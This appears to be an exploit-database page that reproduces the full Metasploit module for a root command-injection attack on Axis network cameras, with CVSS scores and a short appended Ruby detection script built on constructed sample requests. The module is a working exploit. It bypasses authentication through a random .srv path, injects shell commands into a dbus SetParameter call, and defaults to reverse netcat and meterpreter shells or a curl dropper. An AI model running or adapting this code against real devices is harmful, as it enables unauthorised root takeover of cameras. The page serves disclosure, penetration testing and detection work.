metasploit
MSF:EXPLOIT-LINUX-HTTP-AXIS_SRV_PARHAND_RCE-
History: Jul 12, 2018 - 11:46 p.m.

Axis Network Camera .srv-to-parhand RCE

2018-07-12 23:46:49
Or Peles, wvu, sinn3r, Brent Cook, Jacob Robles, Matthew Kienow, Shelby Pace, Chris Lee, Cale Black
www.rapid7.com

CVSS2: 10
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

This module exploits an auth bypass in .srv functionality and a command injection in parhand to execute code as the root user.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'                => 'Axis Network Camera .srv-to-parhand RCE',
      'Description'         => %q{
        This module exploits an auth bypass in .srv functionality and a
        command injection in parhand to execute code as the root user.
      },
      'Author'              => [
        'Or Peles',       # Vulnerability discovery (VDOO)
        'wvu',            # Metasploit module
        'sinn3r',         # Metasploit module
        'Brent Cook',     # Metasploit module
        'Jacob Robles',   # Metasploit module
        'Matthew Kienow', # Metasploit module
        'Shelby Pace',    # Metasploit module
        'Chris Lee',      # Metasploit module
        'Cale Black'      # Metasploit module
      ],
      'References'          => [
        ['CVE', '2018-10660'],
        ['CVE', '2018-10661'],
        ['CVE', '2018-10662'],
        ['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'],
        ['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf']
      ],
      'DisclosureDate'      => '2018-06-18',
      'License'             => MSF_LICENSE,
      'Platform'            => ['unix', 'linux'],
      'Arch'                => [ARCH_CMD, ARCH_ARMLE],
      'Privileged'          => true,
      'Targets'             => [
        ['Unix In-Memory',
          'Platform'        => 'unix',
          'Arch'            => ARCH_CMD,
          'Type'            => :unix_memory,
          'Payload'         => {
            'BadChars'      => ' ',
            'Encoder'       => 'cmd/ifs',
            'Compat'        => {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'netcat-e'
            }
          },
          'DefaultOptions'  => {
            'PAYLOAD'       => 'cmd/unix/reverse_netcat_gaping'
          }
        ],
        ['Linux Dropper',
          'Platform'        => 'linux',
          'Arch'            => ARCH_ARMLE,
          'Type'            => :linux_dropper,
          'DefaultOptions'  => {
            'PAYLOAD'       => 'linux/armle/meterpreter_reverse_tcp'
          }
        ]
      ],
      'DefaultTarget'       => 1,
      'DefaultOptions'      => {'WfsDelay' => 10}
    ))
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => "/index.html/#{rand_srv}"
    )

    if res && res.code == 204
      return CheckCode::Appears
    end

    CheckCode::Safe
  end

  def exploit
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(flavor: :curl, nospace: true)
    end
  end

  def execute_command(cmd, opts = {})
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => "/index.html/#{rand_srv}",
      'vars_post' => {
        'action'  => 'dbus',
        'args'    => dbus_send(
          method: :set_param,
          param:  "string:root.Time.DST.Enabled string:;(#{cmd})&"
        )
      }
    )

    send_request_cgi(
      'method'    => 'POST',
      'uri'       => "/index.html/#{rand_srv}",
      'vars_post' => {
        'action'  => 'dbus',
        'args'    => dbus_send(method: :synch_params)
      }
    )
  end

  def dbus_send(method:, param: nil)
    args = '--system --dest=com.axis.PolicyKitParhand ' \
           '--type=method_call /com/axis/PolicyKitParhand '

    args <<
      case method
      when :set_param
        "com.axis.PolicyKitParhand.SetParameter #{param}"
      when :synch_params
        'com.axis.PolicyKitParhand.SynchParameters'
      end

    args
  end

  def rand_srv
    "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"
  end

end
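
For detection, the requests this module sends have a recognizable shape: a path-info segment ending in .srv appended to another resource, a POST body with action=dbus, and a PolicyKitParhand SetParameter call whose value carries shell metacharacters. The following is an added example, not part of the Metasploit module or of any Axis or Rapid7 code; the function name, indicator symbols and sample requests are constructed for illustration.

```ruby
require 'uri'

# ".srv" path-info segment appended to another resource, the shape of the
# module's "/index.html/<random>.srv" requests.
SRV_PATHINFO = %r{\A/[^?]*\.[A-Za-z0-9]+/[^/?]+\.srv(?:\?|\z)}
# Shell metacharacters that should not occur in a parameter value.
SHELL_META = /[;&|`$()<>]/

# Returns the indicators (symbols) a single logged request matches.
def srv_parhand_findings(verb, target, body = '')
  findings = []
  return findings unless target.match?(SRV_PATHINFO)

  findings << :srv_pathinfo
  return findings unless verb.casecmp?('POST')

  form = begin
    URI.decode_www_form(body).to_h
  rescue ArgumentError
    {} # unparsable body: keep the path finding only
  end
  return findings unless form['action'] == 'dbus'

  findings << :dbus_action
  args = form['args'].to_s
  if args.include?('com.axis.PolicyKitParhand.SetParameter')
    value = args.split('SetParameter', 2).last
    findings << :shell_meta_in_param if value.match?(SHELL_META)
  end
  findings << :synch_params if args.include?('PolicyKitParhand.SynchParameters')
  findings
end

# Constructed sample requests (not captured traffic).
DBUS_PREFIX = '--system --dest=com.axis.PolicyKitParhand --type=method_call ' \
              '/com/axis/PolicyKitParhand com.axis.PolicyKitParhand.'
SAMPLES = [
  ['GET',  '/index.html/AbCd1234.srv', ''],
  ['POST', '/index.html/Zx9q8w7e.srv', URI.encode_www_form(
    'action' => 'dbus',
    'args' => DBUS_PREFIX + 'SetParameter string:root.Time.DST.Enabled string:;(PLACEHOLDER)&'
  )],
  ['POST', '/axis-cgi/param.cgi', 'action=list']
].freeze

SAMPLES.each do |verb, target, body|
  puts "#{verb} #{target} -> #{srv_parhand_findings(verb, target, body).inspect}"
end
```

The input is assumed to be a proxy or WAF log that records request bodies; with path-only access logs, only the :srv_pathinfo indicator is available.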
